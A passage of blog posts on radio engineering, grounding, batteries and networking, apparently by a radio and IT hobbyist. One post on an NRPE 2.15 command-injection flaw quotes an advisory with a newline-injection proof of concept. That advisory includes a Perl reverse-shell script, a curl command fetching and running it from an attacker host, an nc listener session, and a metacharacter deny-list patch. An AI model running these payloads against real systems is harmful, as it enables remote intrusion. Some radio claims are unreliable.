Grounding: Copper Strap vs Structural Steel - Kirby's Musings

| No TrackBacks
In broadcast, multi-tenant, and microwave shelter design, it is desirable to prevent lightning from impacting operations. One way of doing this is by constructing a "halo" around the inside of the building at roof, wall, and/or floor-level or around the outside of the shelter of entire equipment installation.

The fundamental nature of lightning is that of an effective DC pulse channeled through a single point of contact. Because lightning is essentially a large DC pulse like a square wave with a trailing edge, low-frequency AC pulses are induced in nearby wires and radiated when lightning strikes. This is what produces the characteristic "slope" on a spectrum analyzer of a lightning strike.

Since lightning is a static charge equalizing through a single point, it is easy to see that equalization over an area is the desired result of the strike. A tree gets blown to smithereens, but the charge dissipates and equalizes over the area around the strike -- both above and below the point of contact. Using good conductors, the magnitude of voltage across a given area is minimized. This lowered difference in potential prevents large voltages from appearing across equipment.

By running ground strap across the inside walls of the shelter around the perimeter at the ceiling, middle of wall, and floor levels, the lightning is given a path around the equipment instead of through the equipment. This prevents damage as high-resistance points in the equipment won't result in arc flashover due to high voltage across those points. This is not a Faraday cage, but works in a similar fashion. By giving lightning an alternative path of low resistance and impedance, the vast majority of the current goes around rather than through.

NEC compliance confuses this point, because traditional RF grounding for lightning and power grounding are somewhat at odds. Military manuals and Motorola's guide to R25 installation help. In some cases, the halo ground system has been implemented with the power ground opposite the tower coax window / ground panel. This allows NEC compliance with respect to the power ground, while putting a ground rod at the tower base and connecting the two together via 0000 to 2 AWG copper conductors.

At this point, we will discuss the merits of a copper ground halo above equipment versus using building steel and steel bolts.

A 4" copper ground strap 0.022" thick has a total cross section of 0.088 square inches, equating to a little larger than the cross-section of 0 AWG copper wire. 0 AWG copper wire has a resistance of 0.1 ohms per 1,000 ft. Thus, 1,000 feet of 4" 0.022" thick copper strap has a resistance of nearly 0.1 ohms.

A carbon steel wire 0.5" in diameter has a resistance of 0.00034 ohms per foot, or roughly .34 ohms per 1,000 ft. Thus, three 1/2" diameter bolts are nearly equal to 4" 0.022" thick copper strap assuming no other losses.

This calculation does not factor for the resistance of zinc at steel-zinc-zinc-steel junctions. However, one can see that steel-on-steel contact under pressure, three or more (typically six) bolts are enough to allow the building steel to act as a halo, thus not requiring a copper halo be installed as long as the building steel is attached to the ground system.

1" diameter carbon steel has a resistance of 9.0 x 10^-5 ohms per foot or .09 ohms per 1kft, so one can see why big towers often are not connected together with ground straps from section to section but smaller towers are.

It would be preferable to have the building steel sections welded together, or jumpers cadwelded around each joint.

100 KHz Data Channels - Kirby's Musings

| No TrackBacks
In amateur radio we have 100 KHz wide data channels at a maxiumum of 19.2 kbaud (not kbit, kbaud indicates a symbol rate, not the actual data transferred or the binary serial data rate) at 222 MHz and above. However, very few radios actually support this data mode.

One approach to solve this problem is by using frequency-division multiplexing and inverse multiplexing. Inverse multiplexing separates a single high-speed serial data stream into a specific sequence of several slower serial data flows which pass over multiple data links of some form and are resequenced and combined at the opposite end of the link back into a high-speed data stream.

Using frequency-division multiplexing allows multiple voice channels to share a common group channel as if they were added up on the frequency axis. six 300 - 4,000 Hz voice channels are stacked to create a 300 - 24 KHz baseband voice group. That group when applied to an FM modulator with a modulation index of 1 in an occupied bandwidth of approximately 100KHz as calculated by Carson's Rule ( 24 KHz + 24 KHz = 48 KHz; 48 KHz * 2 = 96 KHz). (FCC Part 97 states that modulation index may not be greater than one.)

By splitting the resistive hybrid combiners from an external V.90 or V.92 modem (33.6 K or 56 K), the modem can be duplexed to use a four-wire interface with a separate TX and RX audio pair instead of a two-wire interface with both RX and TX combined. By capturing the independent audio streams using sound cards or DSP, the streams can be combined into four or just with simple processing. The incoming audio is captured at 8,000 samples per second with a 8-bit sample depth. The audio is mixed / stacked / combined using simple processor math or DSP, resulting in an audio stream that extends from 300 Hz to 24KHz. This is within the capabilities of 48KHz or 96 KHz sound cards, and there are USB varieties of each today. The resulting combined audio stream is applied directly to the modulator of a radio, creating the 100KHz wide modulated signal. To receive the signal, one need only remove the IF filters from the FM radio and replace the 20KHz filters with 100 KHz filters. The modulator may require specific modifications; some PLL loops operate at 50 KHz and may be incapable of handling the broad bandwidth.

The reason why 0-300 Hz is not used is to prevent issues with DC coupling in the modulator or demodulator. This also allows for introducing a low-frequency signaling component or clock synchronization carrier without introducing large amounts of AM, FM, and/or PM interference of any combination thereof.

The V.90 modem has a carrier frequency of 3429 Hz and runs at QAM256, encoding eight bits of information per resulting symbol. The V.90 and V.92 modem cores do not exist in an open-source format and contain related patents. Therefore, this is a circumstance where the modem function is effectively offloaded to dedicated hardware.

Combining the data flows from the six modems requires a form of inverse multiplexing. Rather than re-engineer and re-implement this in an format specific to this application, one may use Multilink PPP to effectively manage the modems and modem connectivity as well as perform frame disassembly and assembly.

Since digital switching is not involved, it is not possible to achieve 56 K or 64 K data rates. Instead, the maximum analog rate is the limit at 33.6 kbit/s per modem. This aggregates to 201.6 kbit/s, with one byte per modem being sent per symbol transmitted, (i.e.: 3429 * 6 = 20574 but the actual baud rate is 3429 Hz). Six bytes are transmitted per symbol time aggregated across all modems.

If one transmitter is located at 420.050 and another further up the band at 446.550 MHz, then duplexing may be possible without using cavity filters.


Why Analog Meters? - Kirby's Musings

| No TrackBacks
Why should I use analog meters?

  • Require no batteries
  • Can be left in circuit at all times
  • Instant or continuous reading/observation
  • Range can be set by configuration/specification/design

Analog meters may be used for a number of applications for measuring volts, amps, watts, ohms, etc. The biggest advantage is that one need not replace batteries to continue to observe electrical conditions.

Protection

In the case of voltmeters, one can protect the meter by using zener diodes. The range in a voltmeter is set by the coil resistance, as well as the multiplier or ballast resistor.

For ammeters, a pair of Schottky diodes wired back to back will protect the meter movement from large swings, with the hazard being that a 50 or 75 mV Full-Scale Deflection (FSD) meter movement may experience 300-400 mV as the diode starts to conduct, effectively acting like a zener diode.

  • Caveat: Ammeter shunts must be designed or rated for continuous-duty use to remain in circuit all the time. 
A standard shunt is only designed for 66% of the continuous-duty power dissipation requirements.  To maintain resistance rating, a larger shunt must be used that provides the same resistance over the desired range. One may calculate the range based on comparing 50mV shunts to 75 mV shunts and lining up the resistance to power ratings.

50mV is 66% of 75 mV; a 75A 75 mV shunt produces 50mV at 66% of the rated current (75A x 66% = 49.5A). Thus, a 75A 75mV intermittent-duty shunt is also  50mV 50A continuous-duty shunt (plus or minus a few percent).

To protect either in the case or situation of induced RF, liberal use of Schottky diodes and/or 10 - 1000 nF (0.01 uF, 0.1 uF, and 1 uF) capacitors will effectively short out the AC component.

A secondary caveat to using analog meters is that they are not known for accuracy; common meters were +/- 3% accurate, while high-accuracy meters were often +/- 1% accurate. Digital meters are far more accurate, but with accuracy come costs, and external power requirements.

IP Allocation Plan for AMPRNet Alabama - Kirby's Musings

| No TrackBacks
This is my plan for IP Allocation in 44.100.0.0/16 for the Alabama section of AMPRNet:

V1.0:
44.100.0.0 - 44.100.7.255 /21 Backbone networking projects (statewide infrastructure, servers, DNS, DHCP, WWW, etc.)

44.100.8.0 - 44.100.9.255 2x /24: /30s and /31s for fixed links on an individual coordination basis.

44.100.9.0/30 - KK5VD (/28 actual for four links)
44.100.9.4/30 - KK5VD
44.100.9.8/30 - KK5VD
44.100.9.12/30 - KK5VD
44.100.9.16/30 - unallocated

44.100.16.0 - individual allocations as necessary (/24s, etc. start here)

44.100.42.0/24 Allocated N4BWP
44.100.47.0/24 Allocated Madison County Area.

44.100.128.0 /18 Statewide Mesh, OSLR, etc. Individual IPs defined per hostname or IP or request. Netmask: 255.255.192.0


V2.0:
44.100.0.0/24: backbone services space
44.100.1-67/24: one /24 per county.
44.100.68-96: additional networks as needed, such as metro-area links
44.100.97-127: filled from the highest to lowest for point-to-point links, i.e.: 44.100.127.252-255/32
44.100.192-223/19: Mesh space - may be expanded to 44.100.128 and/or 44.100.255.

All of this keeps in mind that RF doesn't respect county boundaries, and there may be more than 252 people using IP in a given county.

Disable Auto-Play On Import in iTunes - Kirby's Musings

| No TrackBacks
From the "Who thought this was a good idea?" Dept.:

How to disable auto-play on import in iTunes:

Open a Terminal.App window and paste this in:

defaults write com.apple.iTunes play-songs-while-importing -bool FALSE

That's all.

AM Transmitter Efficiency Improvement - Kirby's Musings

| No TrackBacks
A carrier control system is sweeping AM radio stations now as AM stations rush to save power, Craig Kopcho says this on his experience:

This is a power saving gizmo that I installed in WOKV's night-time transmitter. It is set for a minus 3 dB dip in carrier and modulation power during periods of peak modulation. You can actually see the power drop with modulation. Now this goes against everything that I have been taught but I notice no degradation in coverage or loudness with the carrier control system working. The advantage of doing this is an overall reduction in power consumption. Again I have been where the signal is almost non-existing and remotely switched this system on and off and I cannot hear the difference. It should be noted that we have been granted permission from the FCC to not conform to traditional carrier shift requirements. The video was shot with the transmitter looking into the dummy load. https://www.youtube.com/watch?v=FARdE7_8bQM
Tom Ray corrects:

Your paragraph... ...is a little misleading. The power in the sidebands doesn't change from full carrier operation - so the modulation power is the same. It's the carrier that drops. And, be honest. When you put it on the air, and first saw the common point meter drop, you thought you had to fix something. That was my reaction.

"Everything old is new again," except there is nothing new here, save for the implementation. The technique originates in AM-compatible SSB and/or DSB with a suppressed carrier (DSB-SC). Dynamic Carrier Control has been around for a while, but real-time conversion from pure AM (even with DCC enabled) to DSB-SC is resulting in lowered power bills significantly (Tom Ray reported consistently measuring a 34% reduction in power consumption with a Harris 3DX50 transmitter, equating to about 23% savings for the entire site after including HVAC savings).

The short explanation of this phenomenon is that the carrier itself is being amplitude modulated prior to mixing or modulation when modulation is maximized. In this way, the implementation is more like AM times AM, or AM squared. It effectively behaves as if one placed a variable attenuator in the RF line and turned down the RF drive level as the modulation level approached maximum modulation. The drive level is returned to normal as the transmitter recovers from the modulation peak.

Historical AM transmitters, like WLW's 500kW station, requires large amounts of power to modulate the plate supply. The modulation power at audio frequencies is fed into a transformer installed between the DC power supply and the RF amplifier tubes and the resulting added or subtracted power effectively turns the carrier on and off on a continuously variable basis up to the limits of transformer core saturation, producing the modulation sidebands around the carrier as the constant carrier is modulated in amplitude by the combination of the two powers. As the transformer approaches saturation, it acts like a reactor or a variable choke, limiting the transfer of power to the final amplifier. This is how the 90-100% modulation is achieved; by pinching off the RF PA's power supply. Old fashioned, but it works.

The above technique is being rediscovered as the Class G amplifier, where the power supply bus rails and transistor biases are switched from several operating voltages, i.e.: -50, -25, -15, -7, -3.5 V and 3.5, 7, 15, 25, 50 V. The amplifier is kept operating as a Class-C amplifier at the different power levels and switched to the next range as more power is needed. Basically, a 150 W transistor (i.e.: 2N3055) is being used as a 100 mW (2N2222 or 2N3904 for the new kids), 1 W, 5 W, or 25W transistor when necessary.  

A two-way FM radio rated for 110W was sometimes rated by the manufacturer for 55W to 110W continuously variable -- that is, the power may be set to any level in that range and left there. The efficiency of the final (Class C) amplifier varies considerably through that range, and at power levels below 80%, may be less efficient than at higher power levels due to the fixed transistor bias levels. Those fixed bias levels cause the transistor to conduct longer at lower power levels, effectively reducing the "pulse like" behavior of a Class C amplifier -- conducting less than 50% of the time, approximately 120 degrees of the 360 degrees in a sine wave (33%) --  into a Class B amplifier, conducting 180 or less degrees (50%) and if bias is set high enough, into a Class AB amplifier, conducting 360 to 180 degrees of the cycle. Here I express conduction angle backwards, since we are moving from more efficient to less efficient as transistor bias voltage goes up and the transistor conducts more and more of the time it takes the sine wave to go through the cycle. That conduction time is being expressed in degrees of a 360 degree circle -- a sine wave may also be expressed as a circle, but that's calculus, vectors, and a whole lot of math.

What DSB-SC is doing is amplitude modulating the RF carrier drive to the final amplifier so that as peak modulation is approached, the RF drive is minimized. The resulting total peak power demand on the final amplifier goes down but the effective signal does not because the carrier is suppressed, reducing the amount of power required to amplify the combined lower and upper sidebands and the carrier.

From http://www.w8ji.com/amplitude_modulation.htm:

(If) Unmodulated carrier = 100 watts (PEP or) average carrier power.

Average is the same as PEP because, absent amplitude modulation, the carrier level is unchanging over time.

100% steady modulated 100 w carrier = 400 watts PEP or 150 watts average or "heating" power. Of this 150 watts average or "heating" power, 100 watts is in the carrier, and 25 watts average power is in each of the two AM signal's sidebands.

Carrier average power = 2/3 of the total 100% modulated average power

Total of both sidebands, average power = 1/3 of total average power under 100% modulation

Average power one sideband = 1/6th average power with 100% modulation

Peak Envelope Power 100% symmetrical modulation = Four times carrier power
As the carrier power is dynamically adjusted lower as modulation power increases, the total power required will flatten out, thus allowing an amplifier of a given size to effectively produce a signal as well as a conventional "pure AM" transmitter. One would think the CB radio guys would have figured this out a decade or two ago to get "more power" from a 4W AM or 12W SSB radio. DSB-SC, one would find the power level somewhere between those two numbers, but that's another story entirely.

NRPE Exploit and Solution - Kirby's Musings

| No TrackBacks
I don't often get on my soapbox, but this has gone on too long without resolution.

1. 4/20/2014, this was posted:

http://www.opsview.com/forum/opsview-core/bug-reports/nrpe-215-vulnerability

Recently, news emerged about a 'vulnerability' in Nagios's NRPE 'agent' - http://1337day.com/exploit/22156Essentially, you can use it to write files or items to /tmp (or any 'write all' directly ('777')) as below:

nagios@nagios-server:/usr/local/nagios/libexec# /usr/local/nagios/libexec/check_nrpe  -H myServer -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
root@nagios-server:/usr/local/nagios/libexec#
Then if you look on your 'monitored server', you'll see:

root@myServer:/proc# cd /tmp/
root@myServer:/tmp# ls -la
total 24
drwxrwxrwt 4 root root 4096 Apr 20 20:24 .
drwxr-xr-x 22 root root 4096 Apr 18 10:30 ..
-rw-r--r-- 1 nagios nagios 0 Apr 20 20:25 vulntest
root@myServer:/tmp#
This isnt best - as, has been seen, some pretty bad people can use this to put all kinds of bitcoin mining rubbish on there, amongst other things. Now, this only works because /tmp is writable to everyone (even on my test server, see below):

root@server:/# ls -la | grep tmp
drwxrwxrwt 4 root root 4096 Apr 20 20:24 tmp
root@server:/#
So - answer number 1 - secure it! Now, if your savvy and use a config management tool like Puppet, Chef, Ansible etc then you can do this en-masse. For me, ive only got the one test server, so i just edited /etc/fstab:

/dev/sda7 /tmp ext3 nosuid,noexec,nodev,rw 0 0

This stops executables running from /tmp, neither any suid programs (more information here): http://www.techrepublic.com/blog/linux-and-open-source/secure-temporary-files-in-linux/171/#.Next step - answer number 2 - secure your boxes with a firewall. NRPE agents should ONLY be accessible from the Nagios monitoring server. The simplest way is to use iptables on the box:

iptables -I INPUT 2 -s 192.168.200.201 -p tcp --dport 5666 -j ACCEPT
And reject NRPE from any other server. This means, only your Nagios server can access the box via 5666 - so, unless your monitoring server gets compromised - you should be in good shape.So - /tmp isnt writable, and no-one can run check_nrpe against the box except your monitoring server.Finally - look at SELinux if your using RHEL/Centos and the likes, and also look at this guide here: http://nagios.sourceforge.net/docs/3_0/security.htmlAt the end of the day, your network is only as secure as you make it - therefore i'd recommend a review of who can access your internal networks, HOW they got access (Firewalls, NAT, etc) and a review of your IPS/IDS if you are experiencing this issue.Also - this may be of interest in the future - check_by_ssh - http://www.techrepublic.com/blog/linux-and-open-source/remotely-monitor-servers-with-the-nagios-check-by-ssh-plugin/.We are currently looking at a patch for this issue in the coming days, so stay tuned to Twitter/Opsview forums for more on this issue.Sam MarshProduct ManagerOpsview


2. From http://1337day.com/exploit/22156
NRPE <= 2.15 - Remote Command Execution Vulnerability, 4/19/2014:

I. VULNERABILITY
-------------------------
 
NRPE - Nagios Remote Plugin Executor  <= 2.15 Remote Command Execution
 
  
II. BACKGROUND
-------------------------
 
Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
 
The NRPE (Nagios Remote Plugin Executor) addon is designed to allow you to
execute Nagios plugins on remote Linux/Unix machines.
The main reason for doing this is to allow Nagios to monitor "local" resources
(like CPU load, memory usage, etc.) on remote machines. Since these public
resources are not usually exposed to external machines, an agent like NRPE must
be installed on the remote Linux/Unix machines.
 
 
  
III. INTRODUCTION
-------------------------
 
Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could
allow an attacker to remotely inject and execute arbitrary code on the host
under NRPE account (typically 'nagios').
The vulnerability is due to NRPE not properly sanitizing user input before
passing it to a command shell as a part of a configured command.
In order for an attacker to take advantage of the host NRPE must be compiled
and configured with command arguments.
No authentication is required to exploit this vulnerability if the NRPE port
has not been protected with a firewall.
 
IV. DESCRIPTION
-------------------------
  
 
NRPE expects definitions of commands in nrpe.cfg config file. Some of the
examples given in the config with hardcoded arguments are:
 
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /dev/hda1
 
when command arguments are enabled then user is also allowed to define
commands with variables like:
 
command[check_users]=/usr/local/nagios/libexec/check_users -w $ARG1$ -c $ARG2$
command[check_disk]=/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
 
This is often suggested for convenience in various nagios/nrpe setup tutorials
on the web.
 
 
To get a result from a defined command in NRPE daemon the following nrpe client
can be used with -a option that passes arguments:
 
# /usr/local/nagios/libexec/check_nrpe  -H 10.10.10.5 -c check_users -a 4 4
 
USERS OK - 4 users currently logged in |users=4;4;4;0
 
 
in case check_users command was defined with arguments as shown above
NRPE would execute:
 
/usr/local/nagios/libexec/check_users -w 4 -c 4
 
on the local system.
 
 
As we can find in the source code of nrpe-2.15/src/nrpe.c NRPE daemon uses popen() function for
command execution:
 
/* executes a system command via popen(), but protects against timeouts */
int my_system(char *command,int timeout,int *early_timeout,char *output,int output_length){
----cut----
                /* run the command */
                fp=popen(command,"r");
 
 
using popen() results in the command being executed with the help of a command shell.
 
Before this function is reached however NRPE takes several measures to prevent
malicious command injection to the shell. That includes filtration based on a blacklist:
 
#define NASTY_METACHARS         "|`&><'\"\\[]{};"
 
/* make sure request doesn't contain nasties */
if(contains_nasty_metachars(pkt->buffer)==TRUE){
    syslog(LOG_ERR,"Error: Request contained illegal metachars!");
 
that prevents bash special characters like semicolon, pipe etc.
 
The code is also making sure that arguments do not contain bash command substitution
i.e. $(ps aux)
 
if(strstr(macro_argv[x],"$(")) {
    syslog(LOG_ERR,"Error: Request contained a bash command substitution!");
    return ERROR;
 
 
Despite these checks the code is vulnerable to command injection as bash shell allows
for multiple command execution if commands are separated by a new line.
None of the checks examines the arguments for an occurrence of a new line character: 0x0A
 
  
V. PROOF OF CONCEPT
-------------------------
  
To execute an arbitrary command an attacker could simply add a new line character after
a parameter and follow it with his own command.
 
To run touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments:
 
# /usr/local/nagios/libexec/check_nrpe  -H 10.10.10.5 -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
 
which make NRPE daemon run the following series of commands:
 
/usr/local/nagios/libexec/check_users -w <new_line>
touch /tmp/vulntest
# -c 4
 
and a file /tmp/vulntest would be created with nagios user as the owner. The hash character is to comment
out the the rest of the arguments.
 
 
An attacker gets a limited set of commands as most of the metacharacters are prohibited by the
blacklist. So for example it's difficult to create new files in the system without using > symbol etc.
 
An attacker could however download a snippet of perl/python etc. code from the web by using wget or
curl command and get a reverse shell. This would allow unrestricted access to the command line:
 
---------[revshell.pl on attackers-server]---------
 
#!/usr/bin/perl
 
use Socket;
 
#attackers ip to connect back to
$i="10.10.10.40";
 
$p=8080;
 
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
 
if(connect(S,sockaddr_in($p,inet_aton($i))))
 
{
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
}
--------------------------------------------------
 
/usr/local/nagios/libexec/check_nrpe  -H 10.10.10.5 -c check_users -a "`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "` 4 "
 
 
 
[attacker@10.10.10.40 ]# nc -v -l 8080
Connection from 10.10.10.5 port 8080 [tcp/ddi-tcp-1] accepted
sh-4.1$ id
uid=501(nagios) gid=501(nagios) groups=501(nagios),502(nagcmd)
sh-4.1$
sh-4.1$ cat /etc/passwd | head -n 4 ; pwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
/
sh-4.1$ ls -l /tmp/tmp_revshell
-rw-rw-r-- 1 nagios nagios 269 Apr 17 05:14 /tmp/tmp_revshell
sh-4.1$ rm -f /tmp/tmp_revshell
 
 
 
VI. BUSINESS IMPACT
-------------------------
 
An attacker could exploit the vulnerability to gain access to the system
in the context of a nagios user this could lead to further compromise
of the server.
  
VII. SYSTEMS AFFECTED
-------------------------
 
Current version of NRPE 2.15 and older are vulnerable.
  
VIII. SOLUTION
-------------------------
 
Disable command arguments if possible.
Protect access to NRPE port and only allow access from a trusted
nagios server.
Install updated version of NRPE when it becomes available.
  
IX. REFERENCES
-------------------------
 
http://www.nagios.org
http://sourceforge.net/projects/nagios/files/nrpe-2.x/
http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details
http://legalhackers.com/advisories/nagios-nrpe.txt

# F8888C01AE0BB66C   1337day.com [2014-07-24]   4F480D1B5D7C5F9D #
3. From http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details :

Current Version
2.15
Last Release Date
2013-09-06
Compatible With
  • Nagios 1.x
  • Nagios 2.x
  • Nagios 3.x

4. Yes, so that's V2.15, released on 09-06-2013, found sploitable on 4-19-2014, responded to on 4-20-2014... and not fixed by 07-29-2014.

I've written my own patch and applied it to systems I work on:

#define NASTY_METACHARS         "\x7c\x60\x26\x3e\x3c\x27\x22\x24\x5c\x5b\x5d\x7b\x7d\x28\x29\x3b\x2a\x0a\x0d\x0f\x3f\x2e"
/* 
 *  Nasty Characters as defined by kirby:
 *  pipe, backtick, ampersand, lessthan, greaterthan,\
 *  singlequote, doublequote, backslash, brackets,\
 *  curlybraces, parenthesis, semicolon, asterisk, ASCII \
 *  \x01 (start of heading) through \0x1f (unit separator),\
 *  (<- skipped) question mark, delete, dollar sign,
 *  period.
 *
 * \x04 is EOF; exclude \! because it's the separator.
 */ 

The fact that this issue has been unaddressed for three months and it is one of the central daemons to Nagios is reprehensible. Additionally, the initial text of the #define given includes a second error in it: an unescaped single quote. I sidestepped the escape issue by declaring them all as hexadecimal from the ASCII chart.  This speaks of two glaring problems: 1) no code review, 2) no code testing, and 3) no actual security testing or analysis.

While Sam Marsh is right, that the daemon should be firewalled off from all hosts except for the intended target / host, the fact that this is considered as a remedial measure is also unacceptable. Security should be through defense in depth, not a hurried response to the crisis of the day. Security should be involved from the very beginning, particularly where network communications are involved.

The fact that this product is being sold for money means that at the very least, a gaping hole like this should be addressed post-haste.

Ham Radio's Next Retro Frontier: Tropo - Kirby's Musings

| No TrackBacks
While recently reading about the AN/TRC-170, it occurred to me that it is more than possible for amateur radio operators to use this technology much like they do Near Vertical Incident Skywave (NVIS) propagation over HF radio.

Wikipedia page on Troposcatter Communications.

Basically, Ma Bell and the military used this technology to talk around the world mostly reliably. The old systems used 1 to 10kW klystrons and massive antennas (40dB to 60 dB at 2GHz, or bigger than your average billboard), between 345 - 988 MHz, 1.7 - 2.1 GHz, and 4.4 - 5.0 GHz.  (Communications and Information Systems, by Michael John Ryan, Michael Frater)
Rough calculations figure that the systems only transmitted a signal about 128 KHz wide (32 channels at 4 KHz, SSB being the most common mode over microwave). Selective fading over distance caused noise so the systems often used double or quadruple diversity systems (space and polarization) to mitigate and assure link quality. Documentations by Bell Labs indicates that FDM signals were used to FM modulate a carrier which resulted in less noise but required higher transmitter power.

One factor of troposcatter is that the systems need an unobstructed view of the horizon. This may be difficult to arrange, and existing communications systems in the main lobe of the antenna may be negatively affected, requiring immediate mitigation.

The AN/TRC-170's klystron amplifier has a minimum power output of 2 kW between 4.4 - 5.0 GHz and the set is typically equipped with two six foot or ten foot dishes. It is capable of full-duplex operation, and can transmit about 16Mbit/s of data over 3.5 to 7.0 MHz (QAM or QPSK, two bits per point in the constellation). Armchair calculation gives results that it likely a QPSK signal with 7/8 FEC, the occupied bandwidth is 3.4MHz, which matches up with some Reed-Solomon thrown into the mix. (QPSK at 4MHz results in an occupied spectrum of 2MHz and line codes increase the link speed required (such as how 8b10b turns 100 Mbit/s of data into 125 MHz of physical link).

The AN/TRC-170(V) is capable of providing connectivity to a mixture of up to 32 analog (includes FSK), or digital, local subscriber channels and up to 4 TRI-TAC Digital Trunk Groups (DTG). A single TRI-TAC group consisting of up to 144 subscriber loops (2304 KB/s or 4608 KB/s) can be configured to operate using external equipment vans to provide the high data rate DTG.

This system is probably capable of operating at extremely low Eb/N0s, which it looks like the minimum for this mode is 6 to 9 dB.

Tropo link calculator: http://www.bobatkins.com/radio/scatter2.html

Amateur use of this technology can be fulfilled as follows:

  • Transmitter Power Output Limit is 1.5 kW at the antenna
  • Unlimited antenna gain allowed
  • OET 65 must be complied with
  • Eight-foot dishes from C-band TVRO satellite dishes may be used with tripods or permanently mounted
  • Band choice is limited by antenna gain since transmitter power is limited at 1.5kW
  • Any band may be used if the propagation supports it (and the MUF does not)
  • Practical contacts have been made on 2m, 70cm, and up.
  • 70cm, 33cm, 23cm, 2.4GHz, 3.4GHz, and 5.6 - 5.9 GHz may be most useful depending on amplifier availability.
  • Modulation of a magnetron might be a possibility using phase shifters, but spectral purity requires improvement. A klystron is actually two magnetrons with a drift tube between them holding the electronic beam in the focus coils.
  • Low S/N Ratio is not an issue for CW or narrow bandwidth SSB, ACSSB, AM-compatible SSB, or BPSK. Digital modes with FEC make this most useful.
  • Dual antennas or arrays may be most useful due to power levels present combined with sensitive receiver electronics. 
  • This mode is most useful in rural areas where urban noise is not present
  • Fine control of azimuth and elevation may be necessary as well as prior coordination of likely station locations and/or GPS coordinates to effectively establish communications. 
  • Limitations on amateur use is mostly related to transmit power limits, not antenna size, location, or number.
  • Workarounds for power limits may be deploying multiple transceiver sets at the same location or close by each other operating under the same callsign much like Field Day.
  • SSB and ACSSB carrying digital modes may be the best way to use this mode.

Safety is another factor; a ten-foot diameter Ku-band microwave dish weighs 900 lbs; a tower to hold such an object aloft is typically large and expensive.


The Untenna is a direct driven ring radiator (DDRR) which was manufactured in New York by ComRad Industries, Inc. I believe ComRad is out of business, but I may be wrong. Here is some information I found that I scanned from ComRad:

http://blog.catonic.us/kirby/DDRR/ComRadDDRRBW.pdf

It's not an antenna manual, but one can note that the antenna is simple in construction. It was invented by Dr. Joseph M Boyer and patented in 1964:

https://www.google.com/patents/US3151328
https://www.google.com/patents/US3247515
https://www.google.com/patents/US3680135

The antenna was published in 73 Magazine. I have pulled the JPGs from The Internet Archive Project and combined them into a single PDF linked below.

http://blog.catonic.us/kirby/DDRR/73BoyerDDRRAllParts.pdf

Surprisingly, this early horizontal antenna was cited:

https://www.google.com/patents/US2521550

The antenna shows up in the History of The Bell System, a multi-volume set of books illustrating technological achievements of the Bell Telephone Company.

Other information on the DDRR:

http://www.orionmicro.com/ant/ddrr/ddrr1.htm
http://www.orionmicro.com/ant/ddrr/ddrr2.htm

It appears the DDRR has been used for every imaginable purpose, including NVIS. It is somewhat related to the magnetic loop, which shares many aspects of the antenna.

If you're in need of ideas: https://www.google.com/search?q=ddrr+antenna
This is on the GROL exam, but...

If the duty cycle is 10%, and the radio draws one ampere on receive and twenty-five amperes on transmit, how much battery capacity is needed to provide support for twenty-fours?


90% of the time, the radio will draw 1A.
10% of the time, the radio will draw 25A.

So the average then becomes:

Ia = (1 * 90%) + (25 * 10%)
Ia = (1 * 0.90) + (25 * 0.10)
Ia = 0.90 + 2.5
Ia = 3.4 A

Since the system will draw this more or less continuously, the battery should be sized accordingly. There are caveats however. Most batteries react negatively if the discharge rate is greater than 50% of the amp-hour rate. For instance, attempting to draw 100A out of a 100Ah battery for one hour will only result in a usable capacity of 50Ah. This is because of internal cell resistance.

Ia * time = capacity required
3.4A * 24h = 81.6Ah

Additional capacity should be provided so the battery is never fully discharged, and to cope with temperature extremes which limit the ability to both charge and discharge the battery.

If the discharge rate exceeds 50% of the battery capacity, derating (additional capacity) will be necessary to provide enough power to run the load.

Most batteries are specified on a twenty hour (20h) discharge cycle, not a twenty-four hour (24h) cycle. Therefore an additional 20% is required if calculating based on battery data; the 24h rate requires 120% the battery of the 20h rate for the same current draw, if using back of the envelope calculation. For calculations like the above, this issue is not considered because the time for discharge is defined.

A good safety margin is 125% - 250%. If 81.6Ah is required, 100Ah will allow for some reserve capacity, and 200Ah will allow for the temperature dropping below 60 degrees F or exceeding 85 degrees F.

Always remember to keep your batteries off the ground, and not sitting on a metal plate as coldsinking effectively removes capacity.

Additional resources:

http://www.norcalqrp.org/files/Batteries_and_Charging_Systems_KK6MC_whitepaper.pdf

http://www.industrial.panasonic.com/eu/i/00000/id_ni-mh_1104_e/id_ni-mh_1104_e.pdf
http://www.w4hh.org/solar%20power/solar%20page%201.htm